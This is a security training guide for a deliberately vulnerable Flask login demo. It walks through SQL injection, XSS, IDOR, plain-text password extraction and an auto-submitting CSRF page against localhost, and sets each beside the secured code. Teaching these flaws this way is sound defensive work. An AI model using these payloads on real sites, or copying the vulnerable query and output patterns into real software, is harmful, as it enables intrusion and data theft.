Skip to main content

Overview

This guide provides hands-on instructions for testing each vulnerability in the Auth Security Demo. Each test includes:
  • Vulnerability description and severity
  • Step-by-step exploitation instructions
  • Expected results
  • Comparison with secure implementation
Ethical Use Only: These techniques are for educational purposes in controlled environments. Unauthorized testing on production systems is illegal.

Testing Environment

Before testing, ensure both applications are running: 
# Terminal 1: Vulnerable app
cd vulnerable && python3 app.py

# Terminal 2: Secure app
cd secure && python3 app.py

Vulnerable App

http://localhost:5000

Secure App

http://localhost:5001

Vulnerability #1: SQL Injection

Severity: Critical (CVSS 9.8) | CWE: CWE-89

What is SQL Injection?

SQL Injection occurs when user input is directly concatenated into SQL queries without sanitization, allowing attackers to execute arbitrary database commands.

Vulnerable Code Location

vulnerable/app.py:26 
# VULNERABLE: String concatenation
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)

Testing SQL Injection

1

Navigate to vulnerable login

Open http://localhost:5000/login in your browser
2

Enter malicious payload

Use these credentials:Username:
admin
Password:
x' OR '1'='1
This payload closes the password string and adds a condition that’s always true.
3

Observe the result

Success indicators:
  • You’re logged in as admin without knowing the real password
  • Redirected to /dashboard
  • Session shows admin privileges
Check the terminal logs to see the executed query:
Query ejecutada: SELECT * FROM users WHERE username = 'admin' AND password = 'x' OR '1'='1'

Test on Secure Version

Try the same payloads on http://localhost:5001/login: 
# SECURE: Parameterized query (secure/app.py:55)
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (username,))
Expected result: “Credenciales incorrectas” - The payloads are treated as literal strings.

Vulnerability #2: Cross-Site Scripting (XSS)

Severity: High (CVSS 7.5) | CWE: CWE-79

What is XSS?

XSS allows attackers to inject malicious JavaScript that executes in victims’ browsers, potentially stealing cookies, sessions, or performing actions on their behalf.

Vulnerable Code Location

vulnerable/app.py:82-86 
# VULNERABLE: Unescaped output
message = request.args.get('message', '')
return render_template('dashboard.html', message=message)

Testing XSS

1

Login to vulnerable app

First, authenticate:
  • Username: admin
  • Password: admin123
2

Inject XSS payload

Navigate to this URL (or paste in browser):
http://localhost:5000/dashboard?message=<script>alert('XSS')</script>
3

Observe JavaScript execution

Success indicators:
  • Alert popup appears with “XSS”
  • JavaScript code executed in browser context
  • View page source to see unescaped script tag

Test on Secure Version

Try the same payloads on http://localhost:5001/dashboard: 
# SECURE: HTML escaping (secure/app.py:132-136)
from markupsafe import escape
message = request.args.get('message', '')
return render_template('dashboard.html', message=escape(message))
Expected result: The script tags are displayed as text, not executed. Example: 
&lt;script&gt;alert('XSS')&lt;/script&gt;

Vulnerability #3: Insecure Direct Object Reference (IDOR)

Severity: Medium (CVSS 6.5) | CWE: CWE-639

What is IDOR?

IDOR occurs when an application exposes direct references to internal objects (like user IDs) without proper authorization checks, allowing users to access others’ data.

Vulnerable Code Location

vulnerable/app.py:95-101 
# VULNERABLE: No authorization check
user_id = request.args.get('id', session['user_id'])
cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")

Testing IDOR

1

Login as regular user

  • Username: usuario
  • Password: password123
Navigate to http://localhost:5000/profile
2

Note your user ID

Your profile URL might be:
http://localhost:5000/profile?id=2
3

Access admin profile

Change the ID parameter:
http://localhost:5000/profile?id=1
Success: You can view the admin’s profile including email and role.
4

Enumerate all users

Try different IDs:
http://localhost:5000/profile?id=1
http://localhost:5000/profile?id=2
http://localhost:5000/profile?id=3
You can view any user’s data without authorization.

Test on Secure Version

Try the same on http://localhost:5001/profile: 
# SECURE: Authorization check (secure/app.py:146-158)
requested_id = int(requested_id)
if requested_id != session['user_id'] and session.get('role') != 'admin':
    flash('No tienes permiso para ver este perfil', 'danger')
    return redirect('/dashboard')
Expected result: “No tienes permiso para ver este perfil” - Access denied unless you’re viewing your own profile or you’re an admin.

Vulnerability #4: Insecure Password Storage

Severity: Critical (CVSS 9.1) | CWE: CWE-256

What is the Issue?

Passwords stored in plain text can be immediately used if the database is compromised through SQL injection or other means.

Comparing Password Storage

# VULNERABLE: Plain text passwords
cursor.execute("""
    INSERT INTO users (username, password, email, role) 
    VALUES (?, ?, ?, ?)
""", ('admin', 'admin123', '[email protected]', 'admin'))

Testing Password Storage

1

Extract passwords via SQL injection

Using the SQL injection technique, extract passwords:Payload:
' UNION SELECT id, username, password, email, role, created_at FROM users --
On vulnerable app: Passwords are visible as admin123, password123
2

Direct database inspection

# View vulnerable database
sqlite3 vulnerable/users.db "SELECT username, password FROM users"
Output:
admin|admin123
usuario|password123
3

Compare with secure database

# View secure database
sqlite3 secure/users.db "SELECT username, password FROM users"
Output:
admin|scrypt:32768:8:1$abc123...
usuario|scrypt:32768:8:1$def456...
Secure: Passwords are hashed and cannot be reversed.

Vulnerability #5: Missing CSRF Protection

Severity: Medium (CVSS 6.5) | CWE: CWE-352

What is CSRF?

Cross-Site Request Forgery tricks authenticated users into submitting malicious requests without their knowledge.

Testing CSRF

1

Create malicious HTML page

Create a file csrf-attack.html:
<!DOCTYPE html>
<html>
<body>
  <h1>Click here for free prize!</h1>
  <form action="http://localhost:5000/register" method="POST" id="attack">
    <input type="hidden" name="username" value="hacker">
    <input type="hidden" name="password" value="hacked123">
    <input type="hidden" name="email" value="[email protected]">
  </form>
  <script>document.getElementById('attack').submit();</script>
</body>
</html>
2

Test on vulnerable app

  1. Login to http://localhost:5000
  2. Open csrf-attack.html in the same browser
  3. The form auto-submits and creates a user
Vulnerable: New user created without user consent.
3

Test on secure app

Try the same attack on http://localhost:5001Protected: Flask-WTF blocks the request due to missing CSRF token.Error: “400 Bad Request: The CSRF token is missing”

Testing Checklist

  • Authentication bypass with ' OR '1'='1
  • Comment injection with admin' --
  • UNION-based data extraction
  • Error-based SQL injection
  • Verify secure app blocks all attempts
  • Basic alert payload <script>alert('XSS')</script>
  • Cookie theft via document.cookie
  • DOM manipulation
  • Image-based XSS with onerror
  • Verify secure app escapes all HTML
  • Access other users’ profiles by changing ID
  • Enumerate all user IDs
  • Try accessing admin profile as regular user
  • Verify secure app enforces authorization
  • Extract passwords via SQL injection
  • Inspect database directly
  • Verify vulnerable app stores plain text
  • Verify secure app uses bcrypt hashes
  • Create malicious form
  • Test auto-submission on vulnerable app
  • Verify secure app requires CSRF token

Impact Summary

VulnerabilityVulnerable AppSecure AppImpact
SQL Injection✅ Exploitable❌ ProtectedFull database access
XSS✅ Exploitable❌ ProtectedSession theft, defacement
IDOR✅ Exploitable❌ ProtectedUnauthorized data access
Plain Text Passwords✅ Present❌ HashedCredential compromise
CSRF✅ Exploitable❌ ProtectedUnauthorized actions

Next Steps

Troubleshooting

Fix issues encountered during testing

Vulnerability Details

Learn more about each vulnerability

Build docs developers (and LLMs) love

Get started for freeTalk to us